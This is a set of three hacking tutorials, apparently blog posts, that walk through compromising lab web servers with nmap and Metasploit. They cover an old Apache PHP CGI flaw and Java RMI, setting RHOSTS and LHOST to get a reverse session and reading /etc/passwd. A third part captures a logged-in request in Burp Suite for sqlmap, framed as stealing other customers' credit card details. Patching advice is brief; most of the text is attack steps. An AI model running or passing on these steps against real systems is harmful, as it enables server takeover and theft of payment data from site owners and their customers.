Hacking web servers – Apache PHP CGI (Easy Hacking)

Apache is widely used on hundreds of thousands of web servers across the internet. Therefore the chances of finding Apache servers which are running older versions is highly likely, and with hundreds of vulnerabilities coming to light over the years it is all too easy to find an exploit for older versions and gain a root shell. Here we find a server running Apache 2.2.8 on port 80 and show how we can then fully compromise the server in under 3 minutes, and access the password file.

We touch on this time and again just how important it is to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server it is at risk of being compromised very quickly.

In this tutorial we are using just nmap and metasploit framework which are built into Kali linux which we use for most of our tutorials. Download is here; https://www.kali.org/downloads/

First we scan the web server which has an IP address of 192.168.56.103 with nmap to identify open ports and the services running on those ports using the following cmd.

nmap -sV -sT –version-all -p 80 192.168.56.103

There is a great cheat sheet here for nmap cmds to help better understand what we are doing; https://www.stationx.net/nmap-cheat-sheet/

This shows us that port 80- is open, that it is running Apache and it gives us the version. All we do from here is go googling to find vulnerabilities for that version, and the year that version came out. Then we can choose either to target the version directly or find an exploit that came out after that version was released. You can use CVE numbers for that as the first part denotes the year is was discovered.

Apache 2.2.8 was released on the 19th of January, 2008!! Let’s look for a CVE from after that date and one that is already available in metasploit framework.

I’m not going to teach you how to google…….but my search brought up a vulnerability in a php cgi script which was the default for that version of Apache. There will be loads of exploits available for this version due to it’s age, we just decided to use this one as it is super reliable for the video demo.

Let’s fire up metasploit and find it.

search type:exploit multi/http/php

We could has also searched by date. Anyway, the one we want is number 0 so we simply type

use 0

It has already configured a payload for us so we check the info on the exploit

show info

Once we’re happy we check which options we need to add to allow it to run.

show options

We can see in the options what is required and what is not by reading the “required” column.

The port is correct (80) we need to add RHOSTS and LHOST
  1. RHOSTS – This is the Remote hosts or the victim machines. We need to set the correct IP address so the exploit knows which machine(s) to target.
  2. LHOST – This is the listening host. This is your machines IP address so the exploit knows which machine to connect back to with the remote session spawned by the exploit.

We do this by using the “set” cmd

set RHOSTS 192.168.56.103

set LHOST 192.168.56.106

Now we have everything configured we just give the “run” cmd which starts the exploit against the victim, and you can see from the video just how quick it is.

All we do now access the password file by using;

cat /etc/passwd

“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can login as admin/root and do whatever we want.

Hacking web servers – Java (Easy Hacking)

Java is rarely updating on web servers and so more often than not when you see it on a web server it will be way out of date. This makes it easy for attackers to get in. Here we find a server running Java RMI on port 1099 and show how we can then fully compromise the server in under 3 minutes, and access the password file.

We touch on this time and again just how important it is to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server it is at risk of being compromised very quickly.

In this tutorial we are using just nmap and metasploit framework which are built into Kali linux which we use for most of our tutorials. Download is here; https://www.kali.org/downloads/

First we scan the web server which has an IP address of 192.168.56.103 with nmap to identify open ports and the services running on those ports using the following cmd.

nmap -sV 192.168.56.103

We can see Java RMI running on port 1099

Next we head over to the metasploit framework to search for any built in exploits we may be able to use.

search type:exploit platform:java rmi

The cmd above is pretty self explanatory, we are performing a search with a type of “exploit” for the platform “java” and addition item “rmi”. We recieve the following output;

See the highlighted module we will use

To load this module we use the “use” cmd

use exploit/multi/misc/java_rmi_server

It informs us it has already selected a payload so next we list the “info” page

info

Then once we are happy we know what we need to configure we load the options

show options

We can see in the options what is required and what is not by reading the “required” column.

Everything is set for us except the RHOSTS and LHOST settings which we need to ensure have the correct IP address.

  1. RHOSTS – This is the Remote hosts or the victim machines. We need to set the correct IP address so the exploit knows which machine(s) to target.
  2. LHOST – This is the listening host. This is your machines IP address so the exploit knows which machine to connect back to with the remote session spawned by the exploit.

We do this by using the “set” cmd

set RHOSTS 192.168.56.103

set LHOST 192.168.56.106

Now we have everything configured we just give the “run” cmd which starts the exploit against the victim, and you can see from the video just how quick it is.

All we do now in the demo video is run the “sysinfo” cmd to show we are on the victim server, and then we access the password file by using;

cat /etc/passwd

“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can login as admin/root and do whatever we want. All because no one updated Java!

How to capture a web page request – Stealing Customer Credit Card Details part 2

This a quick blog off the back of numerous requests for an additional guide for a video we posted on YouTube. https://www.youtube.com/watch?v=cThifvgCcPc

In the above video we show how you can steal credit card numbers straight out of the database by using a legitimate web page request and feeding this into sqlmap.

If you want to know how to capture the web request then this tutorial will show you.

In order to capture the request we need a proxy which sits between the website and our browser which will see the raw data of the requests and responses. This not only gives us visibility, it also gives us the ability to manipulate the requests, but we shall save this for future blogs.

In our demo we are using Kali from here; https://www.kali.org/downloads/ which is a hackers operating system which comes with a browser proxy pre-installed, and so we shall be using Burpsuite. You can install Burpsuite separately if you wish from here; https://portswigger.net/burp/communitydownload

However if you are just starting out then I recommend downloading Kali and installing on Virtualbox; https://www.virtualbox.org/wiki/Downloads as Kali also includes sqlmap which is the other application you need to complete the full attack as shown across both videos.

There are plenty of guides on YouTube so we won’t be covering installation here.

Let’s get to into it;

The reason this method works so well is because you are providing a LEGITIMATE request to the web server, what does this mean? Well, if you are not a member of a web site and you try and login you will get denied access as you don’t have valid credentials to login, this is not a legitimate request. If you are a member you provide your username and password and you are permitted access to the website, this is legitimate.

How does this help? Well alot of webistes have a “manage your account section”, “search for past purchases”, or “my payment information” all of which allow you to search information in your own account. If the website is not coded correctly however, you may be able to use this same search in YOUR account to actually return information from OTHER users accounts. This is where the legitimate response comes in. You are using a legitimate request to the website, and seeing if this can be manipulated to allow the return of more information that expected. This technique is called SQL Injection.

In this demo we are using an account details lookup page to perform this attack.

We are logged in as canaryman, and submit a search for our own account, and this completes as expected.

Burpsuite is already running, but in order for it to be able to intercept the requests we need to configure our browser to use Burpsuite as a proxy. For our machine we go to the browser settings > network settings > then configure as below;

It will be very similar for all browsers, the thing to remember is you are using your localhost address 127.0.0.1, and Burpsuite runs on port 8080.

We now perform the same search again but this time we go to the PROXY and INTERCEPT tabs, and set “intercept” to on. This catches the request as it leaves the browser and before it hits the web server.

We save this to a file as shown, then forward the request so it completes. That’s it.

Watch https://www.youtube.com/watch?v=cThifvgCcPc to see how this request is used to get other users credit card details from the website.